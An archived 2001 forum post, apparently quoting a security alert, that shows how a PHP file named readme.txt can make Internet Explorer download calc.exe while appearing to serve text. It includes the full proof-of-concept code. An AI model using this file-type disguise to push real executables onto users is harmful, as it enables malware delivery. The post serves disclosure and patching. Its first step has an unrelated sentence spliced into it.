1. Copy the real windows calc.exe from a windows system to the html root dir.It's unclear whether all IE versions from 5.0 are vulnerable, but it's definitely something that you should patch (or avoid by using another browser).
2. Copy the readme.txt file below to the same html root dir.
3. go to the url http://yourserver/readme.txt
You will see the same behavior mentioned in the previous alert.
FILE <readme.txt> BEGIN ---- <?php Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename=calc.exe"); readfile("calc.exe"); ?> FILE <readme.txt> END ----
« Older As Seoul Prepares for Soccer World Cup, a Debate I... | A pyramid scheme for web traff... Newer »
This thread has been archived and is closed to new comments
posted by hadashi at 9:31 PM on December 11, 2001